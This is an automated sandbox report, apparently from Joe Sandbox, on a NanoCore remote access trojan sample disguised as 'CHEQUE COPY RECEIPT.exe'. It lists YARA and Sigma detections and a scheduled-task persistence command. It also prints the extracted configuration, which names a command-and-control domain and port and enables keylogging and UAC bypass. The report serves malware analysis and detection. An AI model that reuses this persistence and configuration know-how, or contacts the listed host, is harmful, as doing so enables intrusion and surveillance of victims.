1.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
12.2.CHEQUE COPY RECEIPT.exe.331e3b6.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d5ef:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d61c:$x2: IClientNetworkHost
12.2.CHEQUE COPY RECEIPT.exe.331e3b6.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d5ef:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e6ca:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d609:$s5: IClientLoggingHost
12.2.CHEQUE COPY RECEIPT.exe.331e3b6.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.CHEQUE COPY RECEIPT.exe.331e3b6.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d5a5:$a: NanoCore 0x2d5ba:$a: NanoCore 0x2d5ef:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2d361:$b: ClientPlugin 0x2d37c:$b: ClientPlugin
1.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
1.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.CHEQUE COPY RECEIPT.exe.5640000.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
1.2.CHEQUE COPY RECEIPT.exe.5640000.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
1.2.CHEQUE COPY RECEIPT.exe.5770000.12.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
1.2.CHEQUE COPY RECEIPT.exe.5770000.12.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
1.2.CHEQUE COPY RECEIPT.exe.5770000.12.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d9e5:$x1: NanoCore.ClientPluginHost 0x1da22:$x2: IClientNetworkHost 0x21555:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1d75d:$x1: NanoCore Client.exe 0x1d9e5:$x2: NanoCore.ClientPluginHost 0x1f01e:$s1: PluginCommand 0x1f012:$s2: FileCommand 0x1fec3:$s3: PipeExists 0x25c7a:$s4: PipeCreated 0x1da0f:$s5: IClientLoggingHost
9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1d74d:$a: NanoCore 0x1d75d:$a: NanoCore 0x1d991:$a: NanoCore 0x1d9a5:$a: NanoCore 0x1d9e5:$a: NanoCore 0x1d7ac:$b: ClientPlugin 0x1d9ae:$b: ClientPlugin 0x1d9ee:$b: ClientPlugin 0x1d8d3:$c: ProjectData 0x1e2da:$d: DESCrypto 0x25ca6:$e: KeepAlive 0x23c94:$g: LogClientMessage 0x1fe8f:$i: get_Connected 0x1e610:$j: #=q 0x1e640:$j: #=q 0x1e65c:$j: #=q 0x1e68c:$j: #=q 0x1e6a8:$j: #=q 0x1e6c4:$j: #=q 0x1e6f4:$j: #=q 0x1e710:$j: #=q
1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
Click to see the 170 entries

Sigma Overview

System Summary:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe, ProcessId: 3060, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpE682.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpE682.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe' , ParentImage: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe, ParentProcessId: 3060, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpE682.tmp', ProcessId: 4616

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000C.00000002.282758425.00000000032DC000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "bed38ea9-13ae-4999-bfd6-9ec5f9de3405", "Group": "Default", "Domain1": "chinomso.duckdns.org", "Domain2": "chinomso.duckdns.org", "Port": 7688, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Enable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "chinomso.duckdns.org", "BackupDNSServer": "chinomso.duckdns.org", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Multi AV Scanner detection for domain / URL

Show sources

Source: chinomso.duckdns.org	Virustotal: Detection: 8%			Perma Link
Source: chinomso.duckdns.org	Virustotal: Detection: 8%			Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	ReversingLabs: Detection: 25%
Source: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dll	ReversingLabs: Detection: 14%

Multi AV Scanner detection for submitted file

Show sources

Source: CHEQUE COPY RECEIPT.exe	Virustotal: Detection: 40%			Perma Link
Source: CHEQUE COPY RECEIPT.exe	ReversingLabs: Detection: 25%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000001.00000001.238064388.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.282758425.00000000032DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.508559464.0000000005770000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.258907957.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.282659839.00000000022A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.500407782.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.270410700.0000000002A20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.284708133.0000000004E32000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.501234563.0000000002442000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.282730831.00000000032A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.499385166.0000000000798000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.504663155.0000000003563000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.284375156.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241553138.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.282508013.00000000006AD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.501596655.00000000024D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 5364, type: MEMORY
Source: Yara match	File source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3888, type: MEMORY
Source: Yara match	File source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3060, type: MEMORY
Source: Yara match	File source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 1060, type: MEMORY
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.3570821.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.5774629.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.3327815.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.5770000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.331e3b6.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.5770000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: CHEQUE COPY RECEIPT.exe

Joe Sandbox ML: detected

Source: 1.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 12.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 1.2.CHEQUE COPY RECEIPT.exe.5770000.12.unpack	Avira: Label: TR/NanoCore.fadte
Source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Compliance:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Unpacked PE file: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Unpacked PE file: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Unpacked PE file: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack

Uses 32bit PE files

Show sources

Source: CHEQUE COPY RECEIPT.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: CHEQUE COPY RECEIPT.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbneutral, PublicKeyToken=b77a5c561934e089" /> source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.499385166.0000000000798000.00000004.00000020.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.499581962.0000000000822000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.499385166.0000000000798000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: CHEQUE COPY RECEIPT.exe, 00000000.00000003.234086186.0000000002A80000.00000004.00000001.sdmp, CHEQUE COPY RECEIPT.exe, 00000009.00000003.252668286.0000000002C00000.00000004.00000001.sdmp
